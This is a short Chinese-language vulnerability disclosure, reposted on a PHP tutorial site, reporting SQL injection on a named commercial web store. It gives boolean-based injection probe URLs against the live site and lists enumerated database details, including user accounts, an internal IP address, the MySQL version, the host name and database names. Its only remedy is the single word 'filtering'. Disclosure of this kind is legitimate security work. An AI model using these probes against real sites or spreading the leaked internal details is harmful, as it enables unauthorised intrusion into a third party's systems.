来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 金蝶友商网存在SQL注入漏洞,可以得出相关数据表及记录。漏洞证明:输入1=1得出:http://store.youshang.com/show.php?id=81738%20and%201=1输入1=2得出:http://store.youshang.com/show.php?id=81738%20and%201......
|
金蝶友商网存在SQL注入漏洞,可以得出相关数据表及记录。
漏洞证明: 输入1=1得出: http://store.youshang.com/show.php?id=81738%20and%201=1  输入1=2得出: http://store.youshang.com/show.php?id=81738%20and%201=2  数据库相关信息: Current User: youshangportal@192.168.30.114 Sql Version: 5.0.77-log Current DB: youshangportal System User: youshangportal@192.168.30.114 Host Name: REDHAT64BI Installation dir: /usr/local/mysql/ DB User: 'youshangportal'@'%' Data Bases: information_schema test youshangportal ysproject 相关表明:   修复方案: 一个词“过滤” 作者 小仙仙 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
